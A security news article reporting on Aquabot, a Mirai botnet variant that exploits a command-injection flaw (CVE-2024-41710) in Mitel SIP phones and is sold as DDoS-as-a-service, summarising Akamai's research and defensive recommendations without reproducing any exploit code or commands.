Mirai Botnet Variant ‘Aquabot’ Targets Mitel Devices, Offers DDoS-as-a-Service

January 29, 2025

The latest variant of the notorious Mirai botnet, known as Aquabot, is actively exploiting a known vulnerability, CVE-2024-41710, in Mitel SIP phones. This variant is being promoted on platforms like Telegram for use by other attackers, signaling a shift towards a DDoS-as-a-service model. The Akamai Security Intelligence and Response Team (SIRT) identified this new variant which has a unique ability to communicate with attacker command-and-control (C2).

The CVE-2024-41710 vulnerability, a command-injection flaw, affects various Mitel models used in corporate environments. Exploiting this flaw can provide root access to the device. The Aquabot variant is the third iteration of this botnet, with the first version discovered in November 2023. Subsequent versions have added concealment and persistence mechanisms to prevent device shutdown and restart.

The latest variant, Aquabotv3, introduces a new feature called 'report_kill'. This function reports back to the C2 when a kill signal is caught on the infected device. However, researchers have yet to see any response from the attacker C2 to this function. Another key aspect of Aquabotv3 is its promotion as a DDoS-as-a-service through platforms like Telegram. The bot is advertised under different names, offering Layer 4 and Layer 7 DDoS.

Akamai SIRT observed exploit attempts targeting CVE-2024-41710 in early January. The payload used was almost identical to a proof-of-concept (PoC) developed by Packetlabs' researcher Kyle Burns, released on GitHub in mid-August. Burns discovered that the Mitel 6869i SIP phone, firmware version 6.3.0.1020, failed to sanitize user-supplied input properly, making it vulnerable to the flaw.

The payload delivered in the exploit attempts observed by Akamai SIRT fetches and executes a shell script, which in turn fetches and executes Mirai malware on the target system. This malware supports a variety of architectures, including x86 and ARM. The same domain used in the ad promoting testing is actively spreading Mirai malware.

The majority of botnets responsible for DDoS attacks are based on Mirai and predominantly target Internet of Things (IoT) devices. This makes spreading the malware relatively easy. A recent wave of global DDoS attacks were attributed to Mirai botnet spinoffs, demonstrating that attackers leveraging Mirai show no signs of slowing down.

Given the high return on investment for Mirai for aspiring botnet authors, and the lack of proper security features in many IoT devices, these devices become easy targets for Mirai and its variants. The researchers recommend that organizations secure their IoT devices through discovery or changing default credentials to protect against DDoS threats. Akamai SIRT also provided a list of indicators of compromise (IoCs) and Snort and Yara rules to aid defenders.

Latest News

• Urgent Call to Secure Systems Against Ongoing Attacks Exploiting Microsoft Outlook RCE Vulnerability
• Critical Authentication Bypass Vulnerability in SonicOS: Proof-of-Concept Revealed
• CISA Adds Apple's Flaw to Known Exploited Vulnerabilities Catalog
• Critical Remote Code Execution Vulnerability Detected in Cacti Open-Source Framework
• Critical Zero-Day Vulnerability in Zyxel CPE Series Devices Actively Exploited